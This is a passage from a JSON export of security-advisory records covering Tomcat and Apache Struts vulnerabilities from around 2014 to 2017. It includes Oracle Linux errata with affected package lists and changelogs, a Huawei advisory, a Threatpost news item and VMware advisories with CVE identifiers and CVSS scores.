"packageVersion": "7.0.42-5.el7_0", "arch": "noarch", "packageFilename": "tomcat-jsvc-7.0.42-5.el7_0.noarch.rpm", "packageName": "tomcat-jsvc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.42-5.el7_0", "arch": "noarch", "packageFilename": "tomcat-7.0.42-5.el7_0.noarch.rpm", "packageName": "tomcat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.42-5.el7_0", "arch": "noarch", "packageFilename": "tomcat-servlet-3.0-api-7.0.42-5.el7_0.noarch.rpm", "packageName": "tomcat-servlet-3.0-api", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.42-5.el7_0", "arch": "noarch", "packageFilename": "tomcat-docs-webapp-7.0.42-5.el7_0.noarch.rpm", "packageName": "tomcat-docs-webapp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.42-5.el7_0", "arch": "noarch", "packageFilename": "tomcat-admin-webapps-7.0.42-5.el7_0.noarch.rpm", "packageName": "tomcat-admin-webapps", "operator": "lt"}], "description": "[0:7.0.42-5]\n- Related: CVE-2013-4286\n- Related: CVE-2013-4322\n- Related: CVE-2014-0050\n- revisit patches for above.", "edition": 3, "reporter": "Oracle", "published": "2014-07-20T00:00:00", "title": "tomcat security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0186", "CVE-2013-4322", "CVE-2014-0050", "CVE-2013-4286"], "modified": "2014-07-20T00:00:00", "id": "ELSA-2014-0686", "href": "http://linux.oracle.com/errata/ELSA-2014-0686.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T01:46:56", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageFilename": "tomcat6-el-2.1-api-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-el-2.1-api", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageFilename": "tomcat6-el-2.1-api-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-el-2.1-api", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "src", "packageFilename": "tomcat6-6.0.24-72.el6_5.src.rpm", "packageName": "tomcat6", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "src", "packageFilename": "tomcat6-6.0.24-72.el6_5.src.rpm", "packageName": "tomcat6", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageFilename": "tomcat6-docs-webapp-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-docs-webapp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageFilename": "tomcat6-docs-webapp-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-docs-webapp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageFilename": "tomcat6-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageFilename": "tomcat6-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageFilename": "tomcat6-admin-webapps-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-admin-webapps", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageFilename": "tomcat6-admin-webapps-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-admin-webapps", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageFilename": "tomcat6-jsp-2.1-api-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-jsp-2.1-api", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageFilename": "tomcat6-jsp-2.1-api-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-jsp-2.1-api", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageFilename": "tomcat6-servlet-2.5-api-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-servlet-2.5-api", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageFilename": "tomcat6-servlet-2.5-api-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-servlet-2.5-api", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageFilename": "tomcat6-javadoc-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-javadoc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageFilename": "tomcat6-javadoc-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-javadoc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageFilename": "tomcat6-lib-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-lib", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageFilename": "tomcat6-lib-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-lib", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageFilename": "tomcat6-webapps-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-webapps", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-72.el6_5", "arch": "noarch", "packageFilename": "tomcat6-webapps-6.0.24-72.el6_5.noarch.rpm", "packageName": "tomcat6-webapps", "operator": "lt"}], "description": "[0:6.0.24-72]\n- Related: CVE-2014-0075 - rebuild to generate javadoc\n- correctly. previous build generated 0-length javadoc\n[0:6.0.24-69]\n- Related: CVE-2014-0075 incomplete\n[0:6.0.24-68]\n- Related: CVE-2013-4322. arches needs to be specified\n- as in arches noarch, so docs/webapps will produce\n- full files. building for ppc will generate empty\n- javadoc.\n[0:6.0.24-67]\n- Related: CVE-2014-0050\n- Related: CVE-2013-4322\n[0:6.0.24-66]\n- Resolves: CVE-2014-0099\n- Resolves: CVE-2014-0096\n- Resolves: CVE-2014-0075\n[0:6.0.24-65]\n- Related: CVE-2014-0050 copy paste error", "edition": 3, "reporter": "Oracle", "published": "2014-07-09T00:00:00", "title": "tomcat6 security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0099", "CVE-2013-4322", "CVE-2014-0050", "CVE-2014-0096", "CVE-2014-0075"], "modified": "2014-07-09T00:00:00", "id": "ELSA-2014-0865", "href": "http://linux.oracle.com/errata/ELSA-2014-0865.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T01:47:11", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.76-2.el7", "arch": "noarch", "packageFilename": "tomcat-docs-webapp-7.0.76-2.el7.noarch.rpm", "packageName": "tomcat-docs-webapp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.76-2.el7", "arch": "noarch", "packageFilename": "tomcat-admin-webapps-7.0.76-2.el7.noarch.rpm", "packageName": "tomcat-admin-webapps", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.76-2.el7", "arch": "noarch", "packageFilename": "tomcat-javadoc-7.0.76-2.el7.noarch.rpm", "packageName": "tomcat-javadoc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.76-2.el7", "arch": "src", "packageFilename": "tomcat-7.0.76-2.el7.src.rpm", "packageName": "tomcat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.76-2.el7", "arch": "noarch", "packageFilename": "tomcat-el-2.2-api-7.0.76-2.el7.noarch.rpm", "packageName": "tomcat-el-2.2-api", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.76-2.el7", "arch": "noarch", "packageFilename": "tomcat-lib-7.0.76-2.el7.noarch.rpm", "packageName": "tomcat-lib", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.76-2.el7", "arch": "noarch", "packageFilename": "tomcat-jsp-2.2-api-7.0.76-2.el7.noarch.rpm", "packageName": "tomcat-jsp-2.2-api", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.76-2.el7", "arch": "noarch", "packageFilename": "tomcat-servlet-3.0-api-7.0.76-2.el7.noarch.rpm", "packageName": "tomcat-servlet-3.0-api", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.76-2.el7", "arch": "noarch", "packageFilename": "tomcat-jsvc-7.0.76-2.el7.noarch.rpm", "packageName": "tomcat-jsvc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.76-2.el7", "arch": "noarch", "packageFilename": "tomcat-webapps-7.0.76-2.el7.noarch.rpm", "packageName": "tomcat-webapps", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.76-2.el7", "arch": "noarch", "packageFilename": "tomcat-7.0.76-2.el7.noarch.rpm", "packageName": "tomcat", "operator": "lt"}], "description": "[0:7.0.76-2]\n- Resolves: rhbz#1459747 CVE-2017-5664 tomcat: Security constrained bypass in error page mechanism\n- Resolves: rhbz#1441481 CVE-2017-5647 tomcat: Incorrect handling of pipelined requests when send file was used\n[0:7.0.76-1]\n- Resolves: rhbz#1414895 Rebase tomcat to the current release\n[0:7.0.69-10]\n- Related: rhbz#1368122\n[0:7.0.69-9]\n- Resolves: rhbz#1362213 Tomcat: CGI sets environmental variable based on user supplied Proxy request header\n- Resolves: rhbz#1368122\n[0:7.0.69-7]\n- Resolves: rhbz#1362545\n[0:7.0.69-6]\n- Related: rhbz#1201409 Added /etc/sysconfig/tomcat to the systemd unit for tomcat-jsvc.service\n[0:7.0.69-5]\n- Resolves: rhbz#1347860 The systemd service unit does not allow tomcat to shut down gracefully\n[0:7.0.69-4]\n- Resolves: rhbz#1350438 CVE-2016-3092 tomcat: Usage of vulnerable FileUpload package can result in denial of service\n[0:7.0.69-3]\n- Resolves: rhbz#1347774 The security manager doesn't work correctly (JSPs cannot be compiled)\n[0:7.0.69-2]\n- Rebase Resolves: rhbz#1311622 Getting NoSuchElementException while handling attributes with empty string value in tomcat\n- Rebase Resolves: rhbz#1320853 Add HSTS support\n- Rebase Resolves: rhbz#1293292 CVE-2014-7810 tomcat: Tomcat/JBossWeb: security manager bypass via EL expressions\n- Rebase Resolves: rhbz#1347144 CVE-2016-0706 tomcat: security manager bypass via StatusManagerServlet\n- Rebase Resolves: rhbz#1347139 CVE-2015-5346 tomcat: Session fixation\n- Rebase Resolves: rhbz#1347136 CVE-2015-5345 tomcat: directory disclosure\n- Rebase Resolves: rhbz#1347129 CVE-2015-5174 tomcat: URL Normalization issue\n- Rebase Resolves: rhbz#1347146 CVE-2016-0763 tomcat: security manager bypass via setGlobalContext()\n- Rebase Resolves: rhbz#1347142 CVE-2016-0714 tomcat: Security Manager bypass via persistence mechanisms\n- Rebase Resolves: rhbz#1347133 CVE-2015-5351 tomcat: CSRF token leak\n[0:7.0.69-1]\n- Resolves: rhbz#1287928 Rebase to tomcat 7.0.69\n- Resolves: rhbz#1327326 rpm -V tomcat fails on /var/log/tomcat/catalina.out\n- Resolves: rhbz#1277197 tomcat user has non-existing default shell set\n- Resolves: rhbz#1240279 The command tomcat-digest doesn't work with RHEL 7\n- Resolves: rhbz#1229476 Tomcat startup ONLY options\n- Resolves: rhbz#1133070 Need to include full implementation of tomcat-juli.jar and tomcat-juli-adapters.jar\n- Resolves: rhbz#1201409 Fix the broken tomcat-jsvc service unit\n- Resolves: rhbz#1221896 tomcat.service loads /etc/sysconfig/tomcat without shell expansion\n- Resolves: rhbz#1208402 Mark web.xml in tomcat-admin-webapps as config file\n[0:7.0.54-2]\n- Resolves: CVE-2014-0227\n[0:7.0.54-1]\n- Resolves: rhbz#1141372 - Remove systemv artifacts. Add new systemd\n- artifacts. Rebase on 7.0.54.\n[0:7.0.43-6]\n- Resolves: CVE-2014-0099\n- Resolves: CVE-2014-0096\n- Resolves: CVE-2014-0075\n[0:7.0.42-5]\n- Related: CVE-2013-4286\n- Related: CVE-2013-4322\n- Related: CVE-2014-0050\n- revisit patches for above.\n[0:7.0.42-4]\n- Related: rhbz#1056696 correct packaging for sbin tomcat\n[0:7.0.42-3]\n- Related: CVE-2013-4286. increment build number. missed doing\n- it.\n- Resolves: rhbz#1038183 remove BR for ant-nodeps. it's\n- no long used.\n[0:7.0.42-2]\n- Resolves: rhbz#1056673 Invocation of useradd with shell\n- other than sbin nologin\n- Resolves: rhbz#1056677 preun systemv scriptlet unconditionally\n- stops service\n- Resolves: rhbz#1056696 init.d tomcat does not conform to RHEL7\n- systemd rules. systemv subpackage is removed.\n- Resolves: CVE-2013-4286\n- Resolves: CVE-2013-4322\n- Resolves: CVE-2014-0050\n- Built for rhel-7 RC\n[0:7.0.42-1]\n- Resolves: rhbz#1051657 update to 7.0.42. Ant-nodeps is\n- deprecated.\n[07.0.40-3]\n- Mass rebuild 2013-12-27\n[0:7.0.40-1]\n- Updated to 7.0.40\n- Resolves: rhbz 956569 added missing commons-pool link\n[0:7.0.37-2]\n- Add depmaps for org.eclipse.jetty.orbit\n- Resolves: rhbz#917626\n[0:7.0.39-1]\n- Updated to 7.0.39\n[0:7.0.37-1]\n- Updated to 7.0.37\n[0:7.0.35-1]\n- Updated to 7.0.35\n- systemd SuccessExitStatus=143 for proper stop exit code processing\n[0:7.0.34-1]\n- Updated to 7.0.34\n- ecj >= 4.2.1 now required\n- Resolves: rhbz 889395 concat classpath correctly; chdir to \n[0:7.0.33-2]\n- Resolves: rhbz 883806 refix logdir ownership\n[0:7.0.33-1]\n- Updated to 7.0.33\n- Resolves: rhbz 873620 need chkconfig for update-alternatives\n[0:7.0.32-1]\n- Updated to 7.0.32\n- Resolves: rhbz 842620 symlinks to taglibs\n[0:7.0.29-1]\n- Updated to 7.0.29\n- Add pidfile as tmpfile\n- Use systemd for running as unprivileged user\n- Resolves: rhbz 847751 upgrade path was broken\n- Resolves: rhbz 850343 use new systemd-rpm macros\n[0:7.0.28-2]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_18_Mass_Rebuild\n[0:7.0.28-1]\n- Updated to 7.0.28\n- Resolves: rhbz 820119 Remove bundled apache-commons-dbcp\n- Resolves: rhbz 814900 Added tomcat-coyote POM\n- Resolves: rhbz 810775 Remove systemv stuff from %post scriptlet\n- Remove redhat-lsb R\n[0:7.0.27-2]\n- Fixed native download hack\n[0:7.0.27-1]\n- Updated to 7.0.27\n- Fixed jakarta-taglibs-standard BR and R\n[0:7.0.26-2]\n- Add more depmaps to J2EE apis to help jetty/glassfish updates\n[0:7.0.26-2]\n- Added the POM files for tomcat-api and tomcat-util (#803495)\n[0:7.0.26-1]\n- Updated to 7.0.26\n- Bug 790334: Change ownership of logdir for logrotate\n[0:7.0.25-4]\n- Bug 790694: Priorities of jsp, servlet and el packages updated.\n[0:7.0.25-3]\n- Dropped indirect dependecy to tomcat 5\n[0:7.0.25-2]\n- Added hack for maven depmap of tomcat-juli absolute link [ -f ] pass correctly\n[0:7.0.25-1]\n- Updated to 7.0.25\n- Removed EntityResolver patch (changes already in upstream sources)\n- Place poms and depmaps in the same package as jars\n- Added javax.servlet.descriptor to export-package of servlet-api\n- Move several chkconfig actions and reqs to systemv subpackage\n- New maven depmaps generation method\n- Add patch to support java7. (patch sent upstream).\n- Require java >= 1:1.6.0\n[0:7.0.23-5]\n- Exported javax.servlet.* packages in version 3.0 as 2.6 to make\n servlet-api compatible with Eclipse.\n[0:7.0.23-4]\n- Move jsvc support to subpackage\n[0:7.0.23-2]\n- Add EntityResolver setter patch to jasper for jetty's need. (patch sent upstream).\n[0:7.0.23-3]\n- Added support to /usr/sbin/tomcat-sysd and /usr/sbin/tomcat for\n starting tomcat with jsvc, which allows tomcat to perform some\n privileged operations (e.g. bind to a port < 1024) and then switch\n identity to a non-privileged user. Must add USE_JSVC='true' to\n /etc/tomcat/tomcat.conf or /etc/sysconfig/tomcat.\n[0:7.0.23-1]\n- Updated to 7.0.23\n[0:7.0.22-2]\n- Move tomcat-juli.jar to lib package\n- Drop %update_maven_depmap as in tomcat6\n- Provide native systemd unit file ported from tomcat6\n[0:7.0.22-1]\n- Updated to 7.0.22\n[0:7.0.21-3.1]\n- rebuild (java), rel-eng#4932\n[0:7.0.21-3]\n- Fix basedir mode\n[0:7.0.21-2]\n- Add manifests for el-api, jasper-el, jasper, tomcat, and tomcat-juli.\n[0:7.0.21-1]\n- Updated to 7.0.21\n[0:7.0.20-3]\n- Require java = 1:1.6.0\n[0:7.0.20-2]\n- Require java < 1.7.0\n[0:7.0.20-1]\n- Updated to 7.0.20\n[0:7.0.19-1]\n- Updated to 7.0.19\n[0:7.0.16-1]\n- Updated to 7.0.16\n[0:7.0.14-3]\n- Added initial systemd service\n- Fix some paths\n[0:7.0.14-2]\n- Fixed http source link\n- Securify some permissions\n- Added licenses for el-api and servlet-api\n- Added dependency on jpackage-utils for the javadoc subpackage\n[0:7.0.14-1]\n- Updated to 7.0.14\n[0:7.0.12-4]\n- Provided local paths for libs\n- Fixed dependencies\n- Fixed update temp/work cleanup\n[0:7.0.12-3]\n- Fixed package groups\n- Fixed some permissions\n- Fixed some links\n- Removed old tomcat6 crap\n[0:7.0.12-2]\n- Package now named just tomcat instead of tomcat7\n- Removed Provides: tomcat-log4j\n- Switched to apache-commons-* names instead of jakarta-commons-* .\n- Remove the old changelog\n- BR/R java >= 1:1.6.0 , same for java-devel\n- Removed old tomcat6 crap\n[0:7.0.12-1]\n- Tomcat7", "edition": 3, "reporter": "Oracle", "published": "2017-08-07T00:00:00", "title": "tomcat security, bug fix, and enhancement update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-5351", "CVE-2016-6796", "CVE-2014-0227", "CVE-2016-0714", "CVE-2016-3092", "CVE-2015-5345", "CVE-2016-0762", "CVE-2016-0763", "CVE-2014-0099", "CVE-2017-5647", "CVE-2013-4322", "CVE-2014-0050", "CVE-2015-5346", "CVE-2013-4286", "CVE-2015-5174", "CVE-2016-5018", "CVE-2014-7810", "CVE-2016-0706", "CVE-2017-5664", "CVE-2014-0096", "CVE-2014-0075", "CVE-2016-6794", "CVE-2016-6797"], "modified": "2017-08-07T00:00:00", "id": "ELSA-2017-2247", "href": "http://linux.oracle.com/errata/ELSA-2017-2247.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "huawei": [{"lastseen": "2016-09-05T13:35:23", "references": [], "description": "Some versions of Apache Struts2 software used in Huawei devices have security vulnerabilities. A patch released for the software to fix vulnerabilities CVE-2014-0050 and CVE-2014-0094 has the risk of being bypassed. (Vulnerability ID: HWPSIRT-2014-0420)\nThis Vulnerability has been assigned Common Vulnerabilities and Exposures (CVE) ID: CVE-2014-0116.", "edition": 1, "reporter": "Huawei Technologies", "published": "2014-07-07T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "huawei", "title": "Security Advisory-Apache Struts2 vulnerability on Huawei multiple products", "bulletinFamily": "software", "affectedSoftware": [{"name": "X8", "version": "V200R001C00", "operator": "eq"}, {"name": "USG9580", "version": "AntiDDoS 8030/ 8060/ 8080\n AntiDDoS 1520/ 1550/ 500-D", "operator": "eq"}, {"name": "AnyOffice", "version": "V200R002C10SPC500", "operator": "eq"}, {"name": "X16USG9520", "version": "AntiDDoS 8030/ 8060/ 8080\n AntiDDoS 1520/ 1550/ 500-D", "operator": "eq"}, {"name": "USG9580", "version": "V200R001C00", "operator": "eq"}, {"name": "Eudemon8000E-X3", "version": "V200R001C00", "operator": "eq"}, {"name": "X8", "version": "AntiDDoS 8030/ 8060/ 8080\n AntiDDoS 1520/ 1550/ 500-D", "operator": "eq"}, {"name": "eSpace Meeting Portal", "version": "V100R001C00", "operator": "eq"}, {"name": "Eudemon8000E-X3", "version": "AntiDDoS 8030/ 8060/ 8080\n AntiDDoS 1520/ 1550/ 500-D", "operator": "eq"}, {"name": "USG9560", "version": "V200R001C00", "operator": "eq"}, {"name": "USG9560", "version": "AntiDDoS 8030/ 8060/ 8080\n AntiDDoS 1520/ 1550/ 500-D", "operator": "eq"}, {"name": "X16USG9520", "version": "V200R001C00", "operator": "eq"}], "cvelist": ["CVE-2014-0116", "CVE-2014-0050", "CVE-2014-0094"], "modified": "2014-07-08T00:00:00", "id": "HUAWEI-SA-20140707-01-STRUTS2", "href": "http://www.huawei.com/en/psirt/security-advisories/2014/hw-350733", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:37", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "references": ["http://www.vmware.com/security/advisories/VMSA-2014-0007.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0112", "https://struts.apache.org/announce.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0050", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0094"], "description": "VMware has patched several serious security vulnerabilities in its vCenter Operations Center Management suite, one of which could lead to remote code execution on vulnerable machines.\n\nAll of the vulnerabilities that the company [patched](<http://www.vmware.com/security/advisories/VMSA-2014-0007.html>) lie in the Apache Struts Java application framework, and the most serious of them is CVE-2014-0112, which allows an attacker to run arbitrary code.\n\n\u201cParametersInterceptor in Apache Struts before 2.3.16.2 does not properly restrict access to the getClass method, which allows remote attackers to \u201cmanipulate\u201d the ClassLoader and execute arbitrary code via a crafted request,\u201d the vulnerability [description](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0112>) says.\n\nApache [fixed](<https://struts.apache.org/announce.html>) the vulnerability in a new release of Struts back in April. The issue was created because of an incomplete patch for a previous vulnerability in Struts. The three Struts vulnerabilities all are addressed in the release of version 5.8.2 of VMware vCOPS, the company said.\n\nThe other two, less serious vulnerabilities fixed in the new version of vCOPS are CVE-2014-0050 and CVE-2014-0094. The first flaw is problem that could lead to a denial-of-service condition if exploited by a remote attacker.\n\n\u201cMultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop\u2019s intended exit conditions,\u201d the [advisory](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0050>) says.\n\nCVE-2014-0094 is also remotely exploitable by an unauthenticated attacker, who could manipulate a component of Struts.\n\n\u201cThe ParametersInterceptor in Apache Struts before 2.3.16.1 allows remote attackers to \u201cmanipulate\u201d the ClassLoader via the class parameter, which is passed to the getClass method,\u201d the [advisory](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0094>) says.\n", "reporter": "Dennis Fisher", "published": "2014-06-25T13:59:49", "type": "threatpost", "title": "VMware Patches Apache Struts Flaws in vCOPS", "enchantments": {"score": {"modified": "2018-10-06T22:58:37", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112"], "_object_type": "robots.models.threatpost.ThreatpostBulletin", "modified": "2014-06-25T19:22:45", "id": "THREATPOST:40B4CEF304ADBCA0734F292661E7810B", "href": "https://threatpost.com/vmware-patches-apache-struts-flaws-in-vcops/106858/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "vmware": [{"lastseen": "2018-09-02T02:40:28", "references": [], "affectedPackage": [{"OS": "any", "OSVersion": "any", "packageVersion": "5.7.3", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCOPS", "operator": "lt"}, {"OS": "any", "OSVersion": "any", "packageVersion": "5.8.2", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCOPS", "operator": "lt"}, {"OS": "any", "OSVersion": "any", "packageVersion": "5.1", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCO", "operator": "eq"}, {"OS": "any", "OSVersion": "any", "packageVersion": "4.2", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCO", "operator": "eq"}, {"OS": "any", "OSVersion": "any", "packageVersion": "5.5.2", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCO", "operator": "lt"}], "description": "The Apache Struts library is updated to version 2.3.16.2 to address multiple security issues. \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2014-0050, CVE-2014-0094, and CVE-2014-0112 to these issues. \n \nCVE-2014-0112 may lead to remote code execution. This issue was found to be only partially addressed in CVE-2014-0094. \n \nCVE-2014-0050 may lead to a denial of service condition. \n \nvCenter Operations Management Suite (vCOps) is affected by both CVE-2014-0112 and CVE-2014-0050. Exploitation of CVE-2014-0112 may lead to remote code execution without authentication. \n \nvCenter Orchestrator (vCO) is affected by CVE-2014-0050 and not by CVE-2014-0112. \n \nWorkaround \n \nA workaround for CVE-2014-0112 is documented in VMware Knowledge Base article 2081470. \n \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.\n", "edition": 3, "reporter": "VMware", "published": "2014-06-24T00:00:00", "title": "VMware product updates address security vulnerabilities in Apache Struts library", "type": "vmware", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112"], "modified": "2014-09-09T00:00:00", "id": "VMSA-2014-0007", "href": "https://www.vmware.com/security/advisories/VMSA-2014-0007.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T02:40:28", "references": [], "affectedPackage": [{"OS": "any", "OSVersion": "any", "packageVersion": "5.5 Update 2", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCenter Server", "operator": "lt"}, {"OS": "any", "OSVersion": "any", "packageVersion": "ESXi510-201412101-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "lt"}, {"OS": "any", "OSVersion": "any", "packageVersion": "ESXi550-201409101-SG", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "lt"}, {"OS": "any", "OSVersion": "any", "packageVersion": "5.1 Update 3", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCenter Server", "operator": "lt"}, {"OS": "any", "OSVersion": "any", "packageVersion": "5.0", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "ESXi", "operator": "eq"}, {"OS": "any", "OSVersion": "any", "packageVersion": "5.0", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCenter Server", "operator": "eq"}, {"OS": "any", "OSVersion": "any", "packageVersion": "5.5 Update 2", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCenter Update Manager", "operator": "lt"}, {"OS": "any", "OSVersion": "any", "packageVersion": "5.0 Update 3c", "arch": "any", "packageFilename": "UNKNOWN", "packageName": "vCenter Server", "operator": "lt"}], "description": "a. vCenter Server Apache Struts Update \n\n\nThe Apache Struts library is updated to address a security issue. \n \nThis issue may lead to remote code execution after authentication. \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2014-0114 to this issue. \n \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.\n", "edition": 3, "reporter": "VMware", "published": "2014-09-09T00:00:00", "title": "VMware vSphere product updates to third party libraries", "type": "vmware", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2013-0242", "CVE-2014-0114", "CVE-2013-4322", "CVE-2014-0050", "CVE-2013-1914", "CVE-2013-4590"], "modified": "2014-12-04T00:00:00", "id": "VMSA-2014-0008", "href": "https://www.vmware.com/security/advisories/VMSA-2014-0008.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], 